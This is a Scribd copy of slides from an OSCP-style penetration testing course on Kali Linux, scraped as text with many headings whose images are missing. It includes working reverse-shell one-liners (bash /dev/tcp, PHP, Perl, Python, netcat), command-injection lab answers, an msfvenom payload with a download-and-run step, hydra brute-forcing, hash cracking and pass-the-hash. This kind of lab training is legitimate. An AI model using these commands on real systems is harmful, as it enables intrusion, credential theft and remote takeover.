Scribd
Upload
2K views

OSCP Training - 01

The document outlines an agenda for basic penetration testing training with Kali Linux. It covers topics such as basic commands, information gathering, scanning, enumeration, password attacks, exploitation, and privilege escalation. Each section provides examples of commands and tools to use for tasks like network scanning with Nmap, password cracking with Hydra and John, reverse shells with Metasploit, and local privilege escalation. The document also includes examples of exercises like using Metasploit to exploit vulnerabilities and gaining initial access.

Uploaded by

fa1c0n king
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
2K views

OSCP Training - 01

The document outlines an agenda for basic penetration testing training with Kali Linux. It covers topics such as basic commands, information gathering, scanning, enumeration, password attacks, exploitation, and privilege escalation. Each section provides examples of commands and tools to use for tasks like network scanning with Nmap, password cracking with Hydra and John, reverse shells with Metasploit, and local privilege escalation. The document also includes examples of exercises like using Metasploit to exploit vulnerabilities and gaining initial access.

Uploaded by

fa1c0n king
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 105

OSCP Training

Basic Penetration Testing with Kali Linux

Agenda
Introduction
Part I : Basic Command for Penetration tester
Part II : Information Gathering
Part III : Scanning
Part IV : Enumeration
Part V : Pre-Exploitation Password Attack
Part VI : Exploitation
Part VII : Privilege Escalation
Part VIII : Post-Exploitation
Introduction
Part I : Basic Command
for
Penetration tester
Kali Linux
Update and Upgrade Kali
#Checking apt source
kali# nano /etc/apt/sources.list

#Update and Upgrade Kali


kali# apt-get update
kali# apt-get upgrade
Create web server for download file to target
#Python
kali# python –m SimpleHTTPServer
kali# python –m SimpleHTTPServer 8000
Create web server for download file to target
#Python
Connection testing with netcat
Connection testing with netcat
#Binding

Tester Victim

10.10.10.20 10.10.10.10

kali# nc 10.10.10.10 4444 [Windows OS]


C:\>nc.exe –vnlp 4444 -e cmd.exe

[Unix OS]
Root# nc –vnlp 4444 –e /bin/bash
Connection testing with netcat
#Reverse

Tester Victim

10.10.10.20 10.10.10.10
kali# nc -vnlp 4444 [Windows OS]
C:\> nc.exe 10.10.10.20 4444 -e cmd.exe

[Unix OS]
Root#nc 10.10.10.20 4444 –e /bin/bash
Connection testing with netcat
#Upload File

Tester Victim

10.10.10.20 10.10.10.10

kali# nc 10.10.10.10 4444 < file.txt [Windows OS]


C:\>nc.exe –vnlp 4444 > file.txt

[Unix OS]
Root# nc –vnlp 4444 > file.txt
Connection testing with netcat
#Download File

Tester Victim

10.10.10.20 10.10.10.10
kali# nc 10.10.10.10 4444 > file.txt [Windows OS]
C:\>nc.exe –vnlp 4444 < file.txt

[Unix OS]
Root# nc –vnlp 4444 < file.txt
Reverse shell
#Reverse

Tester Victim

10.10.10.20 192.168.0.10
kali# nc -vnlp 443
Reverse shell
#Netcat-reverse shell
nc 10.10.10.20 443 -e /bin/sh

#Bash-reverse shell
bash -i >& /dev/tcp/10.10.10.20/443 0>&1

#PHP-reverse shell
php -r '$sock=fsockopen("10.10.10.20",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Reverse shell
#Perl-reverse shell
perl -e 'use
Socket;$i="10.10.10.20";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(conne
ct(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S"
);exec("/bin/sh -i");};‘

#Python-reverse shell
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.1
0.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Website Create https://www.revshells.com/


LAB : reverse shell in example scenario
Use Metasploitable 2 as victim
▪ access http://192.168.31.159/dvwa/login.php with admin/password
▪ Set DVWA security to LOW
▪ use command execution lab as the vulnerability
Use Kali as Tester to listen to victim and try reverse shell by using
▪ Netcat
▪ Bash
▪ Php
▪ Perl
▪ python
LAB : reverse shell in example scenario
Hint:
LAB : reverse shell in example scenario
Answer:
127.0.0.1 && nc 192.168.31.132 443 -e /bin/sh

127.0.0.1 && php -r '$sock=fsockopen("192.168.31.132",443);exec("/bin/sh -i <&3>&3 2>&3");'


LAB : reverse shell in example scenario
Part II : Information
Gathering
Information gathering
#Other ways
Google
http://www.google.com
Dnsdumster
https://dnsdumpster.com/
Network tools
https://network-tools.com/
Shodan
https://www.shodan.io
Netcraft
https://www.netcraft.com/
Web Archive
http://web.archive.org
Information gathering
#Internal Network Information gathering (Passive mode)

Tcpdump
kali# tcpdump -i eth0 –vv | grep -v 192.168.31.132
kali# tcpdump -i eth0 –w outfile.pcap

Tshark
kali# tshark
Information gathering
#tcpdump
Information gathering
#tshark
Information gathering
Capture Packets with Tshark
tshark -i eth0 -w capture-output.pcap

Read a Pcap with Tshark


tshark -r capture-output.pcap

HTTP Analysis with Tshark


tshark -i eth0 -Y http.request -T fields -e http.host -e http.user_agent
Information gathering
#wireshark
Information gathering
#rasponder
#sudo responder -I eth0 -wrf
Part III : Scanning
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with nmap
Scanning
Scanning
#Network Scanning with Zenmap
Scanning
#Network Scanning with arp-scan
kali# arp-scan 192.168.31.0/24
Web Scanning
#Basic web scanning by Nikto
kali#nikto -h http://victim.com
kali#nikto -h https://victim.com:443
Web Scanning
#Basic web path enumeration with dirb
kali#dirb http://victim.com
Web Scanning

#Basic web path enumeration with dirbuster


Part IV : Enumeration
What is Enumeration?
Enumeration
Enumeration
#Basic Enumeration by searchsploit
kali# searchsploit keyword
Enumeration
#Basic Enumeration by Exploit-DB web
Enumeration
#Basic Enumeration by Exploit-DB web
Part V : Pre-Exploitation
Password Attack
Password Attack
#Basic password attack by hydra
Password Attack
#Basic password attack by hydra
kali# gzip -d /usr/share/wordlists/rockyou.txt.gz

kali# hydra 192.168.1.1 ssh -l <login-name> -P <wordlist> -s 22 –vV


kali# hydra 10.10.1.131 telnet -l root -P pass.txt
Password Attack
# Hashcat
Password Attack
# John
Part VI : Exploitation
Exploitation
#Basic Exploitation by Metasploit
Exploitation: Badblue
Exploitation: Badblue
Exploitation: Badblue
Exploitation: Badblue
Exploitation: Badblue
Exploitation: Badblue
Exploitation: CI Server
Exploitation: CI Server
Exploitation: CI Server
Exploitation: CI Server
Exploitation
#Basic Network device exploitation with routersploit

Kali# git clone https://github.com/reverse-shell/routersploit.git


Kali# cd routersploit/
Kali/routersploit# python3 rsf.py
Exploitation
#Basic Network device exploitation with routersploit
Exploitation
#Basic Network device exploitation with routersploit
Exploitation
#Basic Exploitation by Metasploit
#Binding
Tester Victim

#Reverse

Tester Victim
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
Kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.117.137 LPORT=5555 -f exe -o
reverseshell.exe
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
kali# python -m SimpleHTTPServer 8000

At target (Windows 7) Access


http://192.168.117.136:8000/
Download and run the file
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
Part VII : Privilege Escalation
Privilege Escalation
Privilege Escalation
Privilege Escalation
Privilege Escalation
#UNIX #WINDOWS
Privilege Escalation
#Local Privilege Escalation with Metasploit
Privilege Escalation
#Local Privilege Escalation with Metasploit
Download BeRoot tools Privilege Escalation
https://github.com/AlessandroZ/BeRoot/releases
Privilege Escalation
#Local Privilege Escalation with Metasploit
Privilege Escalation
#Local Privilege Escalation with Metasploit
Privilege Escalation
#Local Privilege Escalation with Metasploit
Run file beRoot.exe
>beRoot.exe
Privilege Escalation
#Local Privilege Escalation with Metasploit
Privilege Escalation
#Local Privilege Escalation with Metasploit
Privilege Escalation
#Local Privilege Escalation with Metasploit
Privilege Escalation
#Local Privilege Escalation with Metasploit
Privilege Escalation
#Local Privilege Escalation with Metasploit
Part VIII : Post-Exploitation
Post Exploitation
#hashdump

Copy to file
Post Exploitation
#Crack with John the ripple
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation
#Pass the hash

pth-winexe -U administrator%"aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42"
//192.168.200.132 cmd.exe
Post Exploitation
#Token Impersonation
Post Exploitation
#Token Impersonation
Post Exploitation
#Token Impersonation
Hack The Box | Previse

Connect VPN

Hack The Box

Player
OS : Kali Linux
OS : Linux
Hack The Box
Scan
Nmap - Port Scan
Enumeration
gobuster
Dirbuster
Exploit
Exploring the Admin Area and Source Code
netcat to my own machine
brute-forcin password
Privilege Escalation
SUID
Gitgub
git init --> Initialize a local Git repository
git clone --> Create a local copy of a remote repository
git clean --> Removes untracked files from the working directory
git commit --> Takes the staged snapshot and commits it to the project history
Pentest website list
https://www.exploit-db.com
https://www.revshells.com
https://guif.re/
https://gtfobins.github.io/
https://oscpnotes.infosecsanyam.in/
https://oscp.infosecsanyam.in/

You might also like